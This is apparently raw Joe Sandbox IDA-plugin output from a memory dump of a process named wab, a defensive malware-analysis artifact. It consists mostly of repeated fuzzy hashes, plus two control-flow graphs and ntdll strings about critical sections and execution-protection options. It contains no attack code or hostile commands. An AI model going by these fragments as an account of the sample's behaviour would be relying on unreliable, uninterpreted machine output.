                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7fca3724550a8ff7fd72a1f9984ca2e21da40a0ea67729432dfc855e89ff8c61
                                                                              • Instruction ID: a2cbeeb8048af04c219fdbb1800bb021ec4cc86a6eddd57b431f1451d5754ca3
                                                                              • Opcode Fuzzy Hash: 7fca3724550a8ff7fd72a1f9984ca2e21da40a0ea67729432dfc855e89ff8c61
                                                                              • Instruction Fuzzy Hash: 08900221215D0043D20075684C54B07400547D0303F96C115B4154524CC91589B15925
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c77294adedeadba51a84a6d0a75b289493f2d2c840f70b9bae0180c4e0267cf3
                                                                              • Instruction ID: eae30f08c272f977e27d6ca1cf75559eafc3a9b2a8301faf111af45727cace0a
                                                                              • Opcode Fuzzy Hash: c77294adedeadba51a84a6d0a75b289493f2d2c840f70b9bae0180c4e0267cf3
                                                                              • Instruction Fuzzy Hash: 739002216055004341407168888490680056BE1211796C121B4998520D855989B55A69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2c6e6def503aba4e3c1032339cbd82eabd8327c36fad25557b52aea40c0bc21c
                                                                              • Instruction ID: fae9f46ace39efbbccd275210cdfc9d7ad741dc01501ad1275bdc45f9f9b9c5c
                                                                              • Opcode Fuzzy Hash: 2c6e6def503aba4e3c1032339cbd82eabd8327c36fad25557b52aea40c0bc21c
                                                                              • Instruction Fuzzy Hash: 3590023120590403D10071584848747400547D0302F96C011B9164525E8665C9E16935
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 60de799c1244405a34f6508f5369fdf9d0d3c28883a2f2d3dd7813a484a8b69c
                                                                              • Instruction ID: 0aee77ef56b8ac9a2128f51cac2c4d175c6924b2666d625dab939e1bd9935428
                                                                              • Opcode Fuzzy Hash: 60de799c1244405a34f6508f5369fdf9d0d3c28883a2f2d3dd7813a484a8b69c
                                                                              • Instruction Fuzzy Hash: 4590023120590403D1007158485470B400547D0302F96C011B5164525D862589A16975
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 53f64096ebd8de667079b363fd06a16eb4304cd1c28524ee416f49bf6c00b879
                                                                              • Instruction ID: f4347a10c1e66f16baf87071d2ba5e1bed15636cbe7fb3dfb20ff5f357e444b8
                                                                              • Opcode Fuzzy Hash: 53f64096ebd8de667079b363fd06a16eb4304cd1c28524ee416f49bf6c00b879
                                                                              • Instruction Fuzzy Hash: 2790023120550843D10071584444B46400547E0301F96C016B4124624D8615C9A17925
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 193dd515917544c7e207429852d1a9a5b222315f6d0d5b8875ebf6294d31ef29
                                                                              • Instruction ID: 5bdfa24ae1bd477b8f917125b9e425476f54aa2db27dbd4e226499429f451b26
                                                                              • Opcode Fuzzy Hash: 193dd515917544c7e207429852d1a9a5b222315f6d0d5b8875ebf6294d31ef29
                                                                              • Instruction Fuzzy Hash: AD90043130550403D100715C554C707400547D0301FD7D411F443453CDD757CDF17535
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe09e8bfa3d1454c9c118ee45a891337e14974a52bb821e632a24a9b4bea7f00
                                                                              • Instruction ID: bc164d673f64615daa01ff98916e962f9ecd429730117f7417fe581af1ac6c8e
                                                                              • Opcode Fuzzy Hash: fe09e8bfa3d1454c9c118ee45a891337e14974a52bb821e632a24a9b4bea7f00
                                                                              • Instruction Fuzzy Hash: D190022160950403D14071585458706401547D0201F96D011B4024524DC6598BA56AA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 072cc3b009762931de45afabe4b779fc9389f5353efacf0eebe92d4bd9ffe80a
                                                                              • Instruction ID: ff21630d01e5fcbc9f1227389bb788cadeb822381adfadfc9087c025008de2b2
                                                                              • Opcode Fuzzy Hash: 072cc3b009762931de45afabe4b779fc9389f5353efacf0eebe92d4bd9ffe80a
                                                                              • Instruction Fuzzy Hash: BA90023120550403D10075985448646400547E0301F96D011B9024525EC66589E16535
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1b7aab02d2f96d6a9936ae30db5ddb43c6092be9ab7d652415b5b44f78587c46
                                                                              • Instruction ID: 4e0b9603c546b6bc0c1c24312e9c048c7b9be57d9f8ad33573f5476c2716354d
                                                                              • Opcode Fuzzy Hash: 1b7aab02d2f96d6a9936ae30db5ddb43c6092be9ab7d652415b5b44f78587c46
                                                                              • Instruction Fuzzy Hash: B090023520550403D51071585844646404647D0301F96D411B4424528D865489F1A525
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fada162be03b29e59d7f79f0b112bb09512c73ab2418441eeb2a27cf68df6fb2
                                                                              • Instruction ID: 34f79906e773b5dbe282bec7490a900353ade8700c3dfcfb55d9ee0090491e79
                                                                              • Opcode Fuzzy Hash: fada162be03b29e59d7f79f0b112bb09512c73ab2418441eeb2a27cf68df6fb2
                                                                              • Instruction Fuzzy Hash: 0A90022130550003D14071585458606800597E1301F96D011F4414524CD91589A65626
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ceecf823a621ce97521abff69017cfe2c1eea261ff23542037354d0a7e2017f3
                                                                              • Instruction ID: 83cd2caf1142b97c2707e8d09e0d0c883fb2c27813c00bf4fb81c66b4fdb926b
                                                                              • Opcode Fuzzy Hash: ceecf823a621ce97521abff69017cfe2c1eea261ff23542037354d0a7e2017f3
                                                                              • Instruction Fuzzy Hash: 5490023120650143954072585844A4E810547E1302BD6D415B4015524CC91489B15625
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f6d5864f5fc1313c6442c5cbd83c6632dcab35a235a83fef35f4ae94343996f6
                                                                              • Instruction ID: f939f5471c945669b2a5dc9044b86b72085a5c0019106fcb6eb6dfbbdd153b99
                                                                              • Opcode Fuzzy Hash: f6d5864f5fc1313c6442c5cbd83c6632dcab35a235a83fef35f4ae94343996f6
                                                                              • Instruction Fuzzy Hash: F390022921750003D1807158544860A400547D1202FD6D415B4015528CC91589B95725
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 94fa63c3cb68c895d1a1f82a55dfa4b1c4b6b0519d8a5d65efd3e597cd061ab8
                                                                              • Instruction ID: b944711f1200301794040526b03043d737df5cd789bbe72dd56a28a9c198e811
                                                                              • Opcode Fuzzy Hash: 94fa63c3cb68c895d1a1f82a55dfa4b1c4b6b0519d8a5d65efd3e597cd061ab8
                                                                              • Instruction Fuzzy Hash: B390022120954443D10075585448A06400547D0205F96D011B5064565DC63589A1A535
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 062dff12934d41732745f901d848dbbec22dc7144fb8bf14925b207ccbe64bc2
                                                                              • Instruction ID: 3bd31160c4daa01710f6e925706dcbfd253a4394b9049a7c10fb3ac540459307
                                                                              • Opcode Fuzzy Hash: 062dff12934d41732745f901d848dbbec22dc7144fb8bf14925b207ccbe64bc2
                                                                              • Instruction Fuzzy Hash: 83900221246541535545B1584444507800657E02417D6C012B5414920C852699A6DA25
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bb0d54c67e7c4ce570ae597c769a3e90cc075397b73198ffa1eb549f1a5ce02d
                                                                              • Instruction ID: d8ee3f3ca2318c0c084eea683e2ed7a11226613bec2ac8b78f92fa141f9a69c0
                                                                              • Opcode Fuzzy Hash: bb0d54c67e7c4ce570ae597c769a3e90cc075397b73198ffa1eb549f1a5ce02d
                                                                              • Instruction Fuzzy Hash: A890023124550403D14171584444606400957D0241FD6C012B4424524E86558BA6AE65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction ID: 8e5504e5d7554d7388657e64857e16f94b364b078c003aa4dd8c5180bce1e7eb
                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction Fuzzy Hash:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 681 22742890-227428b3 682 2277a4bc-2277a4c0 681->682 683 227428b9-227428cc 681->683 682->683 684 2277a4c6-2277a4ca 682->684 685 227428dd-227428df 683->685 686 227428ce-227428d7 683->686 684->683 687 2277a4d0-2277a4d4 684->687 689 227428e1-227428e5 685->689 686->685 688 2277a57e-2277a585 686->688 687->683 690 2277a4da-2277a4de 687->690 688->685 691 22742988-2274298e 689->691 692 227428eb-227428fa 689->692 690->683 693 2277a4e4-2277a4eb 690->693 696 22742908-2274290c 691->696 694 22742900-22742905 692->694 695 2277a58a-2277a58d 692->695 697 2277a564-2277a56c 693->697 698 2277a4ed-2277a4f4 693->698 694->696 695->696 696->689 699 2274290e-2274291b 696->699 697->683 700 2277a572-2277a576 697->700 701 2277a4f6-2277a4fe 698->701 702 2277a50b 698->702 703 2277a592-2277a599 699->703 704 22742921 699->704 700->683 705 2277a57c call 22750050 700->705 701->683 706 2277a504-2277a509 701->706 707 2277a510-2277a536 call 22750050 702->707 712 2277a5a1-2277a5c9 call 22750050 703->712 708 22742924-22742926 704->708 723 2277a55d-2277a55f 705->723 706->707 707->723 709 22742993-22742995 708->709 710 22742928-2274292a 708->710 709->710 718 22742997-227429b1 call 22750050 709->718 714 22742946-22742966 call 22750050 710->714 715 2274292c-2274292e 710->715 730 22742969-22742974 714->730 715->714 720 22742930-22742944 call 22750050 715->720 718->730 720->714 727 22742981-22742985 723->727 730->708 732 22742976-22742979 730->732 732->712 733 2274297f 732->733 733->727
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
                                                                              • Opcode ID: 852f05c5c08fca2b2028ebe100f2e05c54ea70e616f618c775545be7a0f63c6f
                                                                              • Instruction ID: d0b204e3765de27c90eb922f1e6cfa8cc5c9e3c292e897af05f4e267b73f47c5
                                                                              • Opcode Fuzzy Hash: 852f05c5c08fca2b2028ebe100f2e05c54ea70e616f618c775545be7a0f63c6f
                                                                              • Instruction Fuzzy Hash: AE51EBB2E08356BFDB11DF688990A7EF7B8BB18200B508269E454E7641D674DE60C7E0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 938 22737630-22737651 939 22737653-2273766f call 2270e660 938->939 940 2273768b-22737699 call 22744c30 938->940 945 22737675-22737682 939->945 946 22774638 939->946 947 22737684 945->947 948 2273769a-227376a9 call 22737818 945->948 950 2277463f-22774645 946->950 947->940 954 22737701-2273770a 948->954 955 227376ab-227376c1 call 227377cd 948->955 952 227376c7-227376d0 call 22737728 950->952 953 2277464b-227746b8 call 2278f290 call 22749020 BaseQueryModuleData 950->953 952->954 963 227376d2 952->963 953->952 975 227746be-227746c6 953->975 958 227376d8-227376e1 954->958 955->950 955->952 965 227376e3-227376f2 call 2273771b 958->965 966 2273770c-2273770e 958->966 963->958 968 227376f4-227376f6 965->968 966->968 971 22737710-22737719 968->971 972 227376f8-227376fa 968->972 971->972 972->947 974 227376fc 972->974 976 227747be-227747d0 call 22742c50 974->976 975->952 977 227746cc-227746d3 975->977 976->947 977->952 979 227746d9-227746e4 977->979 981 227746ea-22774723 call 2278f290 call 2274aaa0 979->981 982 227747b9 call 22744d48 979->982 988 22774725-22774736 call 2278f290 981->988 989 2277473b-2277476b call 2278f290 981->989 982->976 988->954 989->952 994 22774771-2277477f call 2274a770 989->994 997 22774786-227747a3 call 2278f290 call 2277cf9e 994->997 998 22774781-22774783 994->998 997->952 1003 227747a9-227747b2 997->1003 998->997 1003->994 1004 227747b4 1003->1004 1004->952
                                                                              Strings
                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 22774787
                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 22774655
                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 22774742
                                                                              • ExecuteOptions, xrefs: 227746A0
                                                                              • Execute=1, xrefs: 22774713
                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 227746FC
                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 22774725
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                              • API String ID: 0-484625025
                                                                              • Opcode ID: 9a4112256a39c4e983d7a11c29ef6d189802538206907111e3154dcd420e0372
                                                                              • Instruction ID: e150ec257c5506e32ffaac1387a400e54d4b1e5d7ec6fa1c09d5a9226d906d0a
                                                                              • Opcode Fuzzy Hash: 9a4112256a39c4e983d7a11c29ef6d189802538206907111e3154dcd420e0372
                                                                              • Instruction Fuzzy Hash: C5511B31A0831ABAEF129BA4DD99FEE73B8EF14304F4001E9D605A7192DB709E45DF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-$0$0
                                                                              • API String ID: 1302938615-699404926
                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction ID: 64363092041d44dc18730f88d8d3b5c1678e7399ebf8f87cad031ddc85a36113
                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction Fuzzy Hash: 7D81C378E0D34A8EDF05CF64C991BEEBBB6AF45364F14621AD860A7291CF349D40CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • RTL: Re-Waiting, xrefs: 2277031E
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 227702BD
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 227702E7
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                              • API String ID: 0-2474120054
                                                                              • Opcode ID: 1caf207bd51de77c365da6e79295f5285f730a8d3aa6cc7d9fe58448797350ab
                                                                              • Instruction ID: f6d027729b502dc31d3fe2f0df00a8d65dbe064eb8d131fb4ff26b3e7404e448
                                                                              • Opcode Fuzzy Hash: 1caf207bd51de77c365da6e79295f5285f730a8d3aa6cc7d9fe58448797350ab
                                                                              • Instruction Fuzzy Hash: 9BE1883160CB429FD711CF28C984B1AB7F0EB99728F600B6DE5A59B2E1DB74D944CB42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • RTL: Re-Waiting, xrefs: 22777BAC
                                                                              • RTL: Resource at %p, xrefs: 22777B8E
                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 22777B7F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
